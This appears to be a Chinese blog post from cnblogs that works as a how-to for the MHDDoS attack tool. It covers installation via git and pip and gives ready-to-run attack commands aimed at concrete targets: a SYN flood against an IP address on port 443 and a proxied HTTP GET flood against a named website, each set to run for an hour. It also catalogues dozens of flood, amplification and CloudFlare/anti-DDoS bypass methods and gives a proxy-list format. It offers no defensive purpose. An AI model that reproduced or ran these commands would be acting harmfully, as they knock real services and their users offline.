标签：MHddos DNS 攻击 DDOS install pip python3 1.1

定义

DDOS（Distributed-Denial-Of-Service）,即分布式拒绝服务攻击是通过大规模互联网流量淹没目标服务器或其周边基础设施，以破坏目标服务器、服务或网络正常流量的恶意行为。总体而言，DDoS 攻击好比高速公路发生交通堵塞，妨碍常规车辆抵达预定目的地

ddos实际上是以资源换资源的攻击手段

分布式

分布式就是很多机器，一台机器叫做dos攻击

攻击成功的两要素

力量：足够多的僵尸网络

智慧：取巧，特殊的攻击方式

工具MHddos

支持56种攻击方式

linux的攻击强度远强于windows

安装

git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
chmod +x start.py
python3 -m pip install cfscrape
python3 -m pip install certifi
python3 -m pip install dnspython
python3 -m pip install requests
python3 -m pip install impacket
python3 -m pip install psutil
python3 -m pip install icmplib
python3 -m pip install git+https://github.com/MHProDev/PyRoxy.git
python3 -m pip install yarl~=1.7.2
python3 -m pip install cloudscraper
python3 -m pip install pyasn1

攻击实例

UDP攻击 layer4

使用get请求，域名：端口，200个线程，3600秒，ture真：显示提示信息

python3 ./start.py syn 139.9.5.151:443 200 3600 ture

get攻击layer7

使用get请求，域名：端口，socks5代理，100个线程，代理文件，每个代理的连接300个请求，3600秒，ture真：显示提示信息

python3 start.py get https://stitp.cn 5 100 socks5.txt 300 3600 ture

攻击类型分类

第七层攻击

GET|GET洪水

POST| POST洪水

OVH | 绕过OVH

RHEX | 随机十六进制

STOMP | 绕过 chk_captcha

STRESS | 发送高字节的 HTTP 数据包

DYN | 一种带有随机子域的新方法

DOWNLOADER | 一种慢读数据的新方法

SLOW | Slowloris 旧的 DDoS 方法

NULL | 空用户代理

COOKIE | 随机 Cookie PHP ‘if (isset($_COOKIE))’

PPS | 只有 ‘GET / HTTP/1.1\r\n\r\n’

EVEN | 带有更多标头的 GET 方法

GSB | 谷歌项目屏蔽绕过

DGB | DDoS 防护绕过

AVB | Arvan 云绕过

BOT | 像谷歌机器人

XMLRPC | WP XMLRPC expliot（添加 /xmlrpc.php）

CFB | CloudFlare 绕过

CFBUAM | 攻击模式下的 CloudFlare 绕过

BYPASS | 绕过正常的AntiDDoS

BOMB | 绕过codeenberg/bombardier

KILLER | 运行多个线程来杀死一个目标

TOR | 绕过洋葱网站

第四层攻击

TCP | TCP 洪水攻击

UDP | UDP洪水攻击

SYN | SYN 洪水攻击

CPS | 使用代理打开和关闭连接

ICMP | Icmp 回显请求洪水（Layer3）

VSE | 发送 Valve Source Engine 协议

TS3 | 发送 Teamspeak 3 状态 Ping 协议

FIVEM | 发送 Fivem 状态 Ping 协议

MEM | Memcached 放大

NTP | NTP 放大

MCBOT | 我的世界机器人攻击

MINECRAFT | Minecraft 状态 Ping 协议

MCPE | Minecraft PE 状态 Ping 协议

DNS | DNS 放大

CHAR | 电荷放大

CLDAP | Cldap扩增

ARD | Apple 远程桌面放大攻击

RDP | 远程桌面协议放大攻击

socks文件格式

socks5://1.1.1.1:20001

socks4://1.1.1.1:46527

http://1.1.1.1:443:username:password

http://1.1.1.1:80

攻击方式（不全）

HTTP

HTTP洪水攻击

• 大量HTTP请求

• 无法伪造IP地址

• 高匿名代理IP访问

• 避免WEB缓存

• 请求不同资源

• 添加攻击Payloads

HTTPS SSL洪水攻击

• THC SSL密钥重新协商

• SSL握手，解密证书消耗服务器资源

恶意构造请求

慢速请求攻击

Slowloris攻击

TCP

TCP洪水攻击
SYN洪水攻击
RST洪水攻击
恶意构造请求
慢速攻击
反射攻击
Sockstress攻击

DNS

DNS查询洪水攻击

DNS NXDOMAIN洪水攻击：

DNS服务器查询是向DNS服务器查询一个不存在的域名，在进行DNS NXDOMAIN洪水攻击时，DNS服务器会进行多次域名查询，同时，其缓存会被大量NXDOMAIN记录所填满，导致响应正常用户的DNS解析请求的速度变慢。

全部的在这里

MatrixTM/MHDDoS: Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (github.com)

也就是上面工具中说的攻击方式

标签：MHddos,DNS,攻击,DDOS,install,pip,python3,1.1
From： https://www.cnblogs.com/rabbitmind/p/16925659.html